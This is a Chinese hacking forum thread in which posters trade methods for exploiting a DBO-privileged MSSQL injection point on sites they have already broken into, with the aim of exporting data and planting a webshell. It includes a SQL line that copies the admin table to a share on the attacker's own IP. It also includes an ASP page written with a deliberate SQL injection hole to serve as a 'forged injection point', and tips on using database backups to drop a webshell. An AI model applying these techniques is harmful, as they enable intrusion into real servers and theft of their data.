[讨论]一个DBO的MSSQL主入点。搞不到绝对路径。可以跨库。可以查询。怎么导出数据
议题作者:混世魔王信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
一个DBO的MSSQL主入点。搞不到绝对路径。可以跨库。可以查询。怎么导出字段?
ACC 记载
SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin 我也有这个问题!
[求助]如何在查询分析器写语句列目录并保存到表?
最近拿了个站发现其他分站数据库和网站文件都是打乱放的!
例如 A站网页文件和c站的数据库在1服务器
而 c站网页文件和e站的数据库在2服务器
现在得到了 目标分站的数据库帐号密码!
首先当然考虑 [b]伪造注入点 备份马儿![/b]
但无奈按照fierfox老大提供的
<%
strSQLServerName = "192.168.1.14" '服务器名称或地址
strSQLDBUserName = "xxxxxx" '数据库帐号
strSQLDBPassword = "xx" '数据库密码
strSQLDBName = "sver" '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from game_admin where id="&id:rs.open strSQL,conn,1,3
rs.close
%>
进行注入,打开页面时提示
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
第 1 行: '=' 附近有语法错误。
/222.asp,行 12
不知道的那里出错...
id这个值是有的也有纪录在!
现在只好靠手工列目录,在百度找了很久都没关于使用mssql数据库读取目录并保存到表的资料!
来这里希望高手指教下,或者知道上面是那里出错的也请指出! 你说的问题和我现在的情况基本一样,但我不要求导出字段,因为没有物理路径,生成不了shell,不知道下一步怎么办。
我进到后台了,但是后台完全没办法利用,不能改包,没有备份,没有恢复,SQL的库。 有sql账号和密码的话,用存储过程来列表。。。 [s:263] 1.要先确认绝对路径
2.有MSSQL帐户或者是注入点
3.最好存储过程存在! [quote]引用第5楼anki于2007-08-09 09:01发表的 :
1.要先确认绝对路径
2.有MSSQL帐户或者是注入点
3.最好存储过程存在![/quote]
1.要先确认绝对路径 //可以暴出旁站的物理路径,但猜不出目标站的。
2.有MSSQL帐户或者是注入点 //有DBO注入点 可以列跨库名称,但不能跨库查询
3.最好存储过程存在![/quote] //没有执行权限,所有IE提交均无反馈。 [quote]引用第0楼混世魔王于2006-12-13 10:13发表的 [讨论]一个DBO的MSSQL主入点。搞不到绝对路径。可以跨库。可以查询。怎么导出数据 :
议题作者:混世魔王
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
一个DBO的MSSQL主入点。搞不到绝对路径。可以跨库。可以查询。怎么导出字段?
.......[/quote]
搞不到路径,导出的数据放哪里?你的目的是想导出数据到web站目录,从而得webshell?还是只想要数据库中的数据? 我已经有数据库数据了,就想拿个webshell,一直没有好的办法。 开了1433没?
开了的话直接用MSSQL的企业管器连上去~然后直接备份数据库。它会提示你保存的路径。其实就是可以浏览物理路径了。然后用那啥查询分析器直接连上去BACK到你想要的目录就OK了。
页:
[1]